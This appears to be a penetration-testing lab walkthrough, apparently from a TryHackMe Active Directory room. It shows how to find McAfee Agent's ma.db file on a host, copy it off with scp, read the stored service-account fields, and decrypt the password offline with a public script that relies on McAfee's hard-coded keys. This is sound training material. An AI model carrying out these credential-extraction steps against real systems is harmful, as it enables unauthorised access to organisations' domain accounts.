Configuration Files

General

Configuration files are used by applications to store settings, options, and parameters. They often also hold the credentials (passwords, API keys, service-account secrets) the application uses to authenticate to other systems or services, and in a domain environment these are frequently Active Directory accounts. An attacker who can read or modify these files can reuse that material to gain unauthorised access to the systems or services the application is configured to connect to.

One way that configuration files can be exploited is by modifying the configuration options to include malicious parameters or values. For example, an attacker could modify a configuration file to include a malicious URL or command that is executed when the application is started. This could allow the attacker to execute arbitrary code or commands on the system, potentially leading to further compromise.

Another way that configuration files can be exploited is by extracting sensitive information from the files and using it to gain access to other systems or services. For example, an attacker could extract a password from a configuration file and use it to log in to a web application or server.

Commands

Configuration File Credentials

We will focus on recovering credentials from a centrally deployed application in this task. Usually, these applications need a method to authenticate to the domain during both the installation and execution phases.

Example: McAfee Enterprise Endpoint Security, which organisations can use as their endpoint detection and response tool. McAfee embeds the credentials used during installation to connect back to the orchestrator in a file called ma.db. This database file can be retrieved and read with local access to the host to recover the associated AD service account. We will be using the SSH access on THMJMP1 again for this exercise.

Find the database in the application's configuration directory (here ma.db)

thm@THMJMP1 C:\Users\THM>cd C:\ProgramData\McAfee\Agent\DB
thm@THMJMP1 C:\ProgramData\McAfee\Agent\DB>dir
 Volume in drive C is Windows 10
 Volume Serial Number is 6A0F-AA0F

 Directory of C:\ProgramData\McAfee\Agent\DB      

03/05/2022  10:03 AM    <DIR>          .
03/05/2022  10:03 AM    <DIR>          ..
03/05/2022  10:03 AM           120,832 ma.db      
               1 File(s)        120,832 bytes     
               2 Dir(s)  39,426,285,568 bytes free

Copy the file to your attacking machine (SCP)

thm@thm:~/thm# scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
thm@10.200.4.249's password:
ma.db 100%  118KB 144.1KB/s   00:00

Read the database (SQLiteBrowser)

sqlitebrowser ma.db

In sqlitebrowser, select the Browse Data tab and open the AGENT_REPOSITORIES table:

We are particularly interested in the second entry, focusing on the DOMAIN, AUTH_USER, and AUTH_PASSWD fields. Make a note of the values stored in these entries. The AUTH_PASSWD field is encrypted, but McAfee encrypts it with hard-coded keys that have been public for years, so the value can be decrypted offline. We will use the following old Python 2 script to decrypt the password.

===From here on, the steps differ depending on the database and the encryption the application uses. Search whether the encryption key of the application has been leaked before and whether someone on GitHub has published a script to decrypt the stored password.===

You will have to unzip the mcafee-sitelist-pwd-decryption.zip file:

unzip mcafee-sitelist-pwd-decryption.zip

Note: The tool we will use here is quite old. It uses Python v2 and relies on an old crypto library. If you cannot get the script to work on your own VM, please make use of the AttackBox.

By providing the script with our base64 encoded and encrypted password, the script will provide the decrypted password:

thm@thm:~/root/Rooms/BreachingAD/task7/mcafee-sitelist-pwd-decryption-master$ python2 mcafee_sitelist_pwd_decrypt.py <AUTH PASSWD VALUE>
Crypted password   : <AUTH PASSWD VALUE>
Decrypted password : <Decrypted Password>

We now once again have a set of AD credentials that we can use for further enumeration! This is just one example of recovering credentials from configuration files. If you are ever able to gain a foothold on a host, make sure to follow a detailed and refined methodology to ensure that you recover all loot from the host, including credentials and other sensitive information that can be stored in configuration files.